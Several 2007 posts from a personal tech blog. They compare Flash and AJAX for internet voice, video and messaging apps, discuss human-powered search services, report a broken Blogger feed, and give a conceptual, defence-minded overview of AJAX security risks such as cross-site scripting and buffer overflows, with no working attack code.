      Here are the details (PLEASE NOTE – all of this is in context of building ‘Communication Applications on the Internet’)

      First, let me classify what I term as ‘Internet Based Communications’ (IBC) and the primary components that need to be considered there.

      My definition of IBC is ‘a multi-dimensional mode of communication, where one or more users interact with each other and or innovative services using a combination of, but not limited to, voice, video and multimedia messaging in a way that enhances their user experience for interaction’ (no, I am not a lawyer - it is just so hard to get all dimensions into a sentence)


      Before we discuss the right RIA choice for IBC, let us first look at the primary components and their nature as far as ‘load on network’ is concerned (click image to see larger version). The 'bandwidth' understanding is useful to judge whether it is better to do this locally, using local CPU power, or remotely and then have it 'sent to you' as 'frames'.




      Within IBC, what are you making and what is your target market ?

      Deciding on a target market and what you plan to do is critical to decide whether you should go the AJAX way or the Flash way. For example:

      • Is your browser going to be your only client ?
      • Do you expect voice and video to be a part of your service ?
      • How important is security to your product, in a span of now to 5 years down ?
      • How important is ‘animation’ and ‘interactivity’ in your product ?
      • Is making your IBC product available on mobile phones important ?
      • What OSs do you need to support ?
      • Is ‘plugin vs. no plugin’ , ‘open vs. closed’ a big deal for you ?
      And so forth…

      Unless you have a good feel about the nature of your requirement as well as the ‘load factor’ of the components within your product (see table above), making a choice to go with AJAX or Flash is like walking into a bull fight, blind-folded.

      It is important to understand where Flash and AJAX match, and where Flash and AJAX address completely different needs.

      The best way to do the onion ring comparison is to put it in ‘context’. So why not answer the above questions ?

      Is your browser going to be your only client ?

      RIA is not only about your ‘browser’ ! The Internet is not your browser either – it just so happens that a browser is an important tool in the overall environment. However, depending on what you are building, you may need a standalone client, which has all the richness of mashable-ness, web services interface etc. but does not run in the context of your browser. The entire concept of AJAX is that your ‘user experience’ is responsive right within the context of your browser. Flash on the other hand has a concept of a ‘standalone player’ or a ‘browser integrated plugin’. So before you choose one or the other, consider if using a ‘browser as a client only’ meets your business requirement. For example, a using a browser, you cannot have a server directly contact your client, unless the client first made an outgoing request to it (which is why in the AJAX world, you may be aware of techniques such as Polling, Comet, Piggybacking, to simulate such requirements). So if your application needs to go beyond a browser, AJAX may not be much of a choice.

      Do you expect voice and video to be a part of your service ?

      I get confused when people tell me they want AJAX to do voice and video. Voice and Video are CPU intensive operations – most voip solutions use at least some form of a codec which needs to be de-compressed in real time. In addition, if you add video to voice, there are further operations such as audio-video-lip syncing, and many other operations which adds to CPU utilization. In other words, if you are using voice or video, you need local power – it cannot be 100% server based ! For example, if you go to Youtube.com and see a video, the video is being streamed to your local flash-plugin which is an authorized plugin in the context of your browser, and that is doing the heavy lifting of voice and video encode or decode. If you use Wengo Viso to auto-magically insert a video call widget in your website, you are using your local computing power for capturing your video and voice, encoding it and transmitting it to the remote side and vice versa – courtesy of your flash-plugin. So while you think ‘there is no download’ , there is actually a ‘download’ – your flash-plugin that was packaged as part of your browser distribution !

      Simply put, if you need Voice or Video, Flash beats AJAX hands-down. Infact, AJAX really does not play in this space, since it really does not offer a voice or video solution – you pretty much need to craft the solution on your own, which could work, but would be rather onerous, and not as optimized as the flash voice/video experience.

      Also, you must have read about the much blogged about Flash-VoIP effort. I think it makes fabulous sense. If Adobe were to utilize its excellent distribution channels and bundle in a SIP UA and standard voice video codecs in the plugin, the entire browser world automatically gets voip and video enabled and writing web-widgets to activate that functionality becomes trivial. And like I said before, it effectively results in a 'no download' experience, because the download already happened one time before, as part of the 'platform update' and users had no ide
      a of it. So you can walk into a web-cafe, grab an available browser, and start voice/video chatting. Why would you need a local download of another 10MB voice chat software ?

      How important is security to your product, in a span of now to 5 years down ?

      It is commonly known today, that Javascript has several security issues that could be compromised by ‘script-kiddies’. This is of course a function of the maturity of AJAX vs. Flash. As I discussed in another article, this will change over time. But based on my assessment of security, it looks like Flash has a lead in security when compared to AJAX, at least today, and I think for the next 2-3 years. When I searched for flash-exploits, most of them were to do with buffer overflows, and less to do with malformed-script parsing attacks.

      So while Flash is ahead of AJAX here, you need to look into your crystal ball and see what you think your future holds for AJAX and weigh security along with other needs. For example, if you were making a solution like online office productivity, expect the browser as a client, and don’t think you are venturing into the ‘streaming intensive’ applications, AJAX may be a safe choice too.

      How important is ‘animation’ and ‘interactivity’ in your product ?

      If you are building a ‘virtual community’ or an ‘interactive social networking site’ which needs a lot of animation and fabulous transitions in real-time, you would notice Flash to be almost pre-dominant there, with new entrants also showing how AJAX powered interactive sites can also be made, for example, hive. But here is the catch, when you are building animation, you not only need to see the final product, but also need to ask the developers how simple it is to build such a solution. In addition, you need to keep a keen eye on the amount of ‘internet bandwidth’ you are consuming with this animation. The problem with AJAX is that while it has a benefit of ‘truly no plugin required’, it also means that whatever is needed, needs to be sent from the server to the client. If you run a network traffic monitor on graphics intensive solutions using AJAX, you would notice that there is a significant amount of backend downloading going on for supplying image frames as well as a large quantity of controlling logic code (JS, primarily) from the server to your browser. Solutions such as integrating SVG (Scalable Vector Graphics) into AJAX into a usable solution are too premature and only exist as proof that it can be done today. If you have developed in Flash, you would notice that ‘action script’ is only a small part of the overall solution. Flash offers a fabulous graphical animation studio, with easy to understand concepts of timelines, layers, frames and such which make animation really very simple. And the fact that you can control them all using actionscript, makes it a wonderful platform for creating interactive applications. And the other thing is when it comes to effective animation, I truly feel a plugin is a good thing. The server based model cannot beat local graphic-crunching, and the optimized flash plugin, which is written in native language, does a great job in rendering locally, within the frame of your browser if needed. And to boot, my personal experience has been that the file size, if written appropriately is really very small.

      For example, I spent last week reading about flash programming and then wrote a tiny ‘superman’ game for an interactive sidescroller show. It is buggy, but that is due to my own lack of time to make it robust – I just wanted to see how it worked , how simple it was, and how optimized it was. This flash game is a measly 9KB in size.

      Here goes:






      Or consider this fabulous new feature from Flash-8 that not only allows you to capture webcam detail, but process it as well within your actionscript to make 'motion detection' a reality using just a webcam. Apply this to an IBC application of a virtual chatroom. You are equipped with a web-cam, get into the virtual room, and bring your hand forward in front of the PC as a 'hand-shake' gesture. This is captured by your webcam, sent to the actionscript in the SWF that applies and appropriate algorithm to detect pixel changes in frames and evaluates this to be a handshake gesture, and your virtual online character automatically extends his hand to shake with the other virtual characters. And no, you are not using the Nintendo Wii. Just a webcam. Admittedly, detection motion vs. understanding motion are two different problem spaces, but Flash has the tools to make this happen. Like I said, when it comes to interactivity of this nature, Flash is simply fabulous.
      One may want to keep a tab on interesting efforts such as OpenLaszlo's Digital Life and similar. The technology is still very beta and one would need to see how it would scale and fit large content intensive applications over a span of time. I have personally not used OpenLaszlo, but I've talked to ISVs who have used it, and the feedback I got is it still very limited and has a far road ahead.

      Is making your IBC product available on mobile phones important ?

      Here is the fact: AJAX supported browsers for mobile phones are almost non-existant today. Doesn’t matter what Google search tells you on posts about the ‘impending arrival of AJAX for mobiles’. I’ve talked to countless mobile phone ISVs and the story is exactly the same:
      a) We don’t believe the browser is the only client
      b) Most browsers for mobile-phones are ‘limited’ today. Support for AJAX within the ‘limited’ browsers is a double limited !

      AJAX is in the radar , but Flash-lite is the reality there.
      What OSs do you need to support ?
      Theoretically, AJAX implementations should work on all OSes that have browsers that support all the required JS/DHTML/CSS tags needed. Reality would depend on how good current browser support is in those OSes and the plans they have for full compliance. On the desktop/server market, the predominant OSs are Windows, MacOS, Linux and maybe SunOS/Solaris (not any longer though, I think). On the terminal side, the main players are Symbian, Windows Mobile, BREW and some new penetration of real time Linux variants. Flash and/or Flash-lite is available for all of the above. AJAX requirements should also be available for all the server OSs listed above. But if you need support for esoteric/less used OSs, then there is no telling when Flash would be available for them (neither is there any telling whether full AJAX support would be available, but since AJAX is based on open specifications, an enthusiast could craft an AJAX engine (!) for them. So as far as 'guaranteed platform support and if not, let me write it myself' goes, AJAX wins. But if your business is in the mainline supported OSs, flash is fine too. Also, do note that competition is always healthy. Adobe recognizes the emergence of AJAX in certain niche applications, which could have otherwise been served by Flash too (like collaborative documentation, etc.), which is why they have made small entries such as Flex-AJAX bridge to ensure that users have options to work them together, but this is currently limited. So be rest assured th
      at a market leader can get as aggressive as needed to keep it's lead in the market. Adobe is no different.

      Is ‘plugin vs. no plugin’, ‘open vs. closed’ a big deal for you ?

      To be frank - I am often puzzled by this. Flash has a fabulous distribution channel. Almost every browser in the world has the flash plugin, and accepts signed updated from macromedia for flash player updates. Real time voice, video and animation needs local computing power. So what other solution is there, that is deployable en masse other than local clients (or plugins?). Infact, I think Flash has a great advantage here. Since the plugin is already a part of the browser, its ‘downloaded size’ doesn’t count. It reminds me of the argument of Firefox vs. IE. FF folks would always argue that the reason FF seems more sluggish than IE, is that Windows pre-loads parts of the IE engine as part of its OS initialization. So when the user clicks on the IE icon, only the remaining part needs to be loaded, unlike in FF, which needs to load the full she-bang, unless you use some pre-loader. Technically, I get it. From a user experience, I don’t think they get it. To a user, it does not count, if IE gets pre-loaded as part of the OS init. All he knows is that it resulted in a faster load time. The same holds true for Flash vs. AJAX. The plugin download just doesn’t count. If flash does a better job in local rendering of voice/video and animation, for AJAX solutions to play in the market, they need to compete and beat this by offer better performance, not more excuses. In addition, to do anything really useful in AJAX, you need more than just ‘bare-bones’ AJAX. You need to download and use one of the many ‘AJAX toolkits’. Depending on what they do, their size ranges from a few KB to a few mega bytes. So instead of downloading ‘flash player’, you are effectively downloading an ‘AJAX library’ (the innumerable .js script links in many AJAX pages). Alternately, you are generating gobs (hundreds and hundreds of lines) of JS/DHTML code which is being downloaded by your browser which was generated by some AJAX library you used for programming.

      Finally the ‘open vs. closed’ thing. Why is having source code so important? Yes, it is always better to control your destiny. I get that. But in this case, you need to see whether the APIs exposed by flash are limiting you or not. If not, then you shouldn’t be complaining. Also,’open source’ may be important for you for cost purposes. While Adobe distributes the flash and flash-lite player free, they charge for macromedia flash 8, flash-cast and other development solutions. Remember that AJAX has freeware and commercial-ware too. It is all a function of ‘functionality vs. price’. You are the best judge for it.

      Saturday, January 27, 2007

      Why Artificial Intelligence if you can have Peer-Peer Intelligence ?




      It is interesting to note how competitive the search world is getting. The eternal quest for ‘finding the right answer’ is leading this technically advanced generation back to the basics – why not utilize the intelligence of the actual human brain that we are all trying to simulate ?

      Solutions like the recently discontinued ‘Google Answers’ and the currently blossoming Yahoo Answers are examples where you can ask targetted questions to ‘experts’, who can provide you with educated answers. However, in this model, the ‘experts’ are usually more qualified than the average Joe. The power of involving real humans is when you can expand in scale, as well as make it attractive for those contributors, in terms of personal profit. In other words, a model that can utilize the ‘spare time’ of millions of people to offer collective intelligence. Another example of this is the recently launched Linked In’s Question tab. For those who don’t know, LinkedIn is a business networking tool that allows you to connect to several industry professionals. I use it a lot as well. Now that LinkedIn has a great network of Friends, Friends of Friends and so on, it makes sense then, to traverse this network to get targetted information. So they launched Linkedin Answers, where a person can ask a “Question” and anyone in the network can answer it. Questions range from “What is the one killer-app you would like in your cell phone” to “How can we make the law more user friendly?”. The answers come from your network, which may include engineers, VPs, CTOs, CEOs of companies who you get to tap for information. The answers are detailed, and often fabulous. I bet you could’nt get the same quality from a plain google search.

      Similarly, Google went the human route for Image Search. While you can apply complex word algorithms to textual articles, how do you provide relevant image searches ? How do you know a particular image represents a search query like “long tail theory”. Simple, tap into real humans with the Google Image Labeler. Make it a game, get information in return. Beats the heck out of AI engines.

      And then, yesterday, I used ChaCha, the guided search engine. The logic here is again simple, utilize the free time of millions of peers – and have them search for you. They have a huge network of guides, and one guide can invite another. When you launch a ChaCha search, and choose the guided option, a real user responds and chats with you to refine the search. I spent the day talking to several of them – they are real people, who get paid for the hours they log into ChaCha. Depending on which ‘level’ they are graded at (a function of user feedback on their search report, and other factors), they can earn anything between $5 to $10 an hour. I talked to one Guide, a mother of three, who says she loved this ‘part-time job’ – when she needs some extra cash, she logs in, helps people and earns money. When they get ‘promoted’ to a higher grade, their pay can double, she says. I asked if they are trained, and I was told they do go through some level of keyword search training. Personally, I did not find their level of expertise to be any better than the average user (I think I can search far better with advanced search parameters). The challenge, I think, with ChaCha would be to train their people so that more people see a benefit of using their guides. I tested them with search queries for which I knew the answer and waited to see how long they took to get me the right answer but it was an interesting model – I am sure there are many who would find it interesting. It also seems that their payout is heavily based on how I rate their help, so not a single one tried to hurry me. Infact, we even chatted about general things while the Guide searched. I wonder then, if ChaCha like systems could effectively merge search as a service into a larger social networking tool!
      See their blog for other ways to increase your payout using this service.

      All in all, it is very interesting to see how the human collective is being utilized to provide further personalization to the world of search. While one may have thought that 'Simulated Intelligence' would eventually take jobs away from people, I guess the Internet is balancing this well by reaching out to people and offering them new ways to 'mesh into this new world intelligence' and supplement their living. Infact, I was at Internet Telephony last week, where I spoke on 'Effect of Web 2.0 on Telco World' and in one of the keynotes, Rich mentioned that this particular event was full of Military people, because they wanted to learn how they can use VoIP technology to help those disabled in war to earn a living !
      Vive-la-Internet.

      Wednesday, January 17, 2007

      Reader Warning: Messed up Feed


      Feb 09 Update: I found a way to fix blogger's feed sort order. Instead of providing my atom feed to feedburner, I created a Yahoo pipe to sort my feed and provided the Yahoo pipe's RSS to feedburner. So hopefully, after I make this change, you should not see it at the top of the feed. If you do, I have work to do !
      Update: Looks like the new Blogger will continue to re-order posts based on update date. Yeesh and !@$!XX!@* again. read more here.

      Folks, sorry, but it looks like the feed to my website is completely messed up, ever since I upgraded to Blogger Beta. I use feedburner, which in turn takes it feed from the blogger feed at http://corporaterat.blogspot.com/atom.xml . If you look at that Atom feed, you would notice all my posts are topsy turvy, missing posts, and old posts showing up front. Of course, I should have researched before I upgraded, but it is too late now - I am at the mercy of Google to fix rss.

      The positive side: As part of the blogger upgrade is I now have labels (see sidebar) so you can view based on category.

      Not sure what I can do about it except yell and scream. So please don't forget to visit this site every once in a while to see what's new.

      Web 2.0 and AJAX - fundamentally insecure ?



      In the past couple of days, I’ve been delving into supposed security issues that the new Web 2.0 and AJAX enabled sites produce and have been also looking into some claims I heard that for serious applications, one should stick to Flash, since it is inherently more secure, tried and tested than AJAX is today.

      To investigate the inherent and publicized security issues within AJAX, we first need to understand the underlying technologies that AJAX uses. Specifically, AJAX comprises of:

      a) XMLHttpRequest (XHR)– a new functionality, that has been added to most well known browsers today that allow an asynchronous communication mechanism between the browser and the webserver

      b) Client side JavaScript – been around for a long time, an implementation of the ECMA script specification and used as a programming language for many web based applications

      To properly assess AJAX related security issues, then, it makes sense for us to take a look at what sort of security issues do these two critical underlying technologies present.

      XSS – Cross-Site Scripting attacks – A Javascript and URL handling exploit

      The concept here is straight-forward. XSS is not a technology – it refers to a technique, where a malicious user can construct an ‘evil’ input which when passed to a trusted, but vulnerable site, causes that site to compromise it’s users. Consider , for example, a site called www.goodsite.com. Which accepts a search query like so www.goodsite.com/q=mysearch. Now let us assume, that goodsite.com does not do a good job at ensuring that the input provided is validated well. One could construct a URI like www.goodsite/com/q=(insert malicious script code here) and send it off to goodsite. If goodsite let this pass, in effect, the script would be executed in context of the browser session for the user. So, if I were to send you this site URI, and you clicked it, I could for example, hijack your session cookie at goodsite and have it sent to me via embedded javascript (Javascript allows cross-domain HTTP requests). If you think this is trivially avoidable, you’d be surprised at how may ways there are to bypass web server checks. For example, take a look at the myspace exploit that used dynamic HTML and fragmented text blocks to hide substring matches to get caught by the web-server’s parser.

      Ideally, one could consider that XSS should be disallowed, or, all webservers MUST ensure that all special characters are ‘safe’ized (encoded using HTML entities) to ensure that they are not interpreted at the remote side, rather, only displayed. However, with the increasing popularity of responsive web sites using AJAX related technologies, Mash-ups are becoming very common, and the ability for one domain to pass on data for remote script execution helps in managing load on the local host. XSS related vulnerabilties have been around for a long time, and have been successful in infecting a variety of web based solutions, including Php boards, google, apache, mozilla, myspace, yahoo and many more.

      It is important to note that XSS depends on the following:

      a) You somehow pass on a ‘malicious’ URI to a user and get him to click on it (it doesn’t make sense for you to execute the XSS vulnerability in your own browser context, unless you think you can launch a remote exploit due to a buffer underflow or overflow – that is a different attack, and not catagorized under XSS Attacks – more on this later)

      b) It makes an assumption that the web-server receiving this information does not do a good job validating input


      Effect of Web 2.0 on XSS attacks

      Does Web 2.0 impact the risks of XSS attacks? Yes and No. Technically speaking, XSS has nothing to do with Web 2.0 and AJAX. It is a vulnerability that existed much before AJAX as a term was even coined. XSS attacks started surfacing almost as soon as javascript was introduced. However, with the proliferation of Web 2.0 sites, there is a significant increase in collaboration, mash-ups and multi-tenancy which all mean the same thing – there is a larger audience which can now be targetted for vulnerabilities. So the ‘No’ was a technical response. The ‘Yes’ was a market response – due to adoption. However, that is not to say that ‘Web 2.0 results in increased XSS vulnerabilities’. The right statement would be ‘Web 2.0 results in more people using potentially vulnerable techologies, which unless hardened, have a wider possibility of financial and reputation damage’ (heck, sounds like a lawyer crafted that, but you get what I mean). In addition, multi-tenancy (different applications on a single cluster of hosts) means exposed vulnerability of one application can compromise others, unless the multi-tenant host takes very special care of intra-trust-domains (providers usually do a good job of inter-trust-domains, but lag on trust within their own domain, which is why once you get it, you can usually do a lot of damage in periphery nodes).


      XMLHttpRequest (XHR) & Javascript Repudiation Attacks

      This is really is derivative attack on a compromised site (it is interesting to note most of the attacks rely on implementation gaps of web-servers). Assuming that you manage to get a malicious script code, using XHR you can issue as many HTTP commands in it to automatically, ‘agree to some terms and service’, ‘buy item’ etc. that don’t require any specific user input not known to the environment. The exact same thing is also possible to do with Javascript – so this is not really specific to AJAX only (The only new thing AJAX got in was XHR – Javascript existed much before hat). Since the web-server does not know which request came from an embedded XHR or an explicit user click, it is not possible to differentiate between the two.


      Effect of Web 2.0 on Repudiation Attacks

      Once again, with the hype and slickness of XHR+JS applications proliferating around the web, more people should concentrate on architectural and data protection besides only focussing on ‘how to make the interface slicker’. So again, Web 2.0 does not technically make the situation worse, but in the surge of trying to get out prettier applications, developers needs to go back to their basics on implementing a secure enviroment for distributed systems and input validation.

      (AJAX) Bridging

      Bridging is a software concept that has long pre-dated Web 2.0. In effect, it is the process on installing a ‘gateway server’ in between multiple content sources. This ‘gateway server’ maintains a trusted relationship with the backend content servers and is also therefore capable of creating integration logic of how to ‘mesh’ these diverse contents together. This sort of bridging has increased in popularity, with the deployment of mash applications. It introduces another twist to XHR attacks. XHR cannot access HTTP pages which are outside the domain which is being served. For exampl
      e, if a script was running at www.google.com, XHR can’t make a HTTP request to www.yahoo.com . However, if the application is being hosted on a bridge server, then one could use the bridge server URI to access content in the other backend site (for example, if the bridge server knowingly or un-knowingly supports URI redirection). Do note that Javascript also supports this capability, so you don’t need XHR for this. However, now that Browsers also support XHR, even if JS is disabled or blocked, one could launch similar exploits without it. What then happens is that by transitive relationship, if Yahoo were to offer its APIs to a trusted site, the users of that trusted site could now target attacks on Yahoo using common tricks like SQL injection, DoS (repeated HTTP requests via XHR in bulk) and similar.

      Effect of Web 2.0 on XHR Bridging Attacks

      Web based mash-up applications are proliferating today. The use of bridge servers to blend content from multiple sites are getting much more common place today (for instance, mashing google maps with craigslist, house searches and more). In any architecture, the fundamental principle of ‘a chain is only as strong as it’s weakest link’ applies equally here.

      Javascript ‘Script Kidde’ Tricks

      This is a compendium of many tricks which have plagued immature implementations of Javascript. Many of these tricks are very irritating and can destroy user experience. For example, Pascal Meunier maintains a list of some of these irritants, which work even today on the most recent of browsers, and they include:
      a) Dynamically generating a fake page for a valid URI – a simple javascript trick where if you visit http://bad.com and click on a link there for ‘google.com’ it can result in your browser URL changing to google.com but displaying some other crafted page (it works in IE7, FF2.0 smarly displays the URL redirection)
      b) Nasty JS code that traps browser events and does not let you navigate away from the page, unless you close the browser

      And more.

      Ofcourse, JS being a programming language, it can also be used for more serious purposes – like port scanning your own network and potentially reporting found results to an external site.

      Effect of Web 2.0 on JS Vulnerabilties

      Most of the web 2.0 world relies heavily on Javascript. Infact, I can point you to hundreds of sites, that blindly download ‘JS+XHR (AJAX) toolkits’ like prototype.js or others and start using their functions. Just an an example, prototype.js is a 64KB file densely packed with XHR and JS code. How many people actually look into that file ? What stops me from hosting a malicious prototype.js file and having people download that file and use it in their own context and have their context sensitive information sent out ? With the increasing use of JS in commercial sites in quest for a better user experience, the inherent implementation gaps of JS interpreters in browsers have a capability to do much more damage, simply due to a function of it being used in many more mainstream functions than before.

      XHR+JS insecurities vs. Flash

      Comparing this to Flash, when I googled around for vulnerabilities, most of them I came across, were to do with buffer exploits. Simply put, buffer exploits are set of techniques where a malicious user finds a spot of executable code that does not check for input length, and using that, provides a large enough string which overflows the allocated stack for that string. In addition to that, the string is crafted with machine opcodes at the right place, which causes the return address from that function to reach an address within that string, which is actually an encoded instruction set. Effectively it means that the remote user has managed to execute code on the remote platform, thereby launching an internal attack. Such attacks are very old and still prevalent. A great tutorial (old, but gold) for buffer exploits can be read here.

      So while I found such buffer exploits, I did not have much success in finding actionscript related exploits similar in nature to those mentioned above. I did find references to ramdom posts on forums that said a few years ago, actionscript from Flash was in a similar stage, but it seems over the years, the implementation has improved. Again, this was a cursory look – I’d be happy to be pointed to similar exploits in the Flash world.

      Buffer exploits will always remain – detecting and compromising buffer exploits don’t need an open programming language interface like JS. These exploits require more skill to probe and compromise (yes, I am aware of automated buffer exploit scanners, but applying them to different environments requires more skill) and is usually an art for a smaller niche community.

      However, in the entire flash vs. AJAX security debate, I do have another concern. JS and XHR exploits need to be fixed by the ‘browser’ owners – Microsoft, Mozilla, Apple and others. Flash exploits need to be fixed by Adobe and can be done independent of the browser, since Flash is a 3rd party browser plugin, while JS and XHR are core browser implementations. I wonder if this would mean that relying on browser companies to fix issues takes a longer time than relying on Adobe to fix a plugin-issue. Anyway, as Web 2.0 with AJAX continues to go mainstream, only time will tell.

      Conclusion

      What we observe, then, is that most of the vulnerabilties of AJAX are little to do with AJAX and more to do with inherent vulnerabilties of immature implementations and bad architectural choices by developers. Most of the vulnerabilities above boil down to:

      a) User Input is not validated well
      b) Data Integrity and logical firewalling is not thought out well
      c) Current implementations of javascript in browsers is rather dismal
      d) If your architecture is insecure, no technology can rescue you

      What Web 2.0 is doing is making these technologies mainstream. As more people use it, many more bugs come out, and many more people think of hacking insecure sites for fun and profit (nothing new with that). I think overall, this will be beneficial for the web community - there is nothing like taking a technology mainstream to make it robust ! But in the process, developers and marketeers need to be aware that this is an evolving process and should do everything possible to safeguard their own data from the imperfections in the implementation of their chosen tools.

      References
      http://namb.la/popular/tech.html
      http://ajaxian.com/by/topic/security/
      http://www.technicalinfo.net/papers/CSS.html
      http://insecure.org/stf/smashstack.html
      http://www.actionscripthero.co
      m/adventures/

      http://www.viruslist.com/en/analysis?pubid=184625030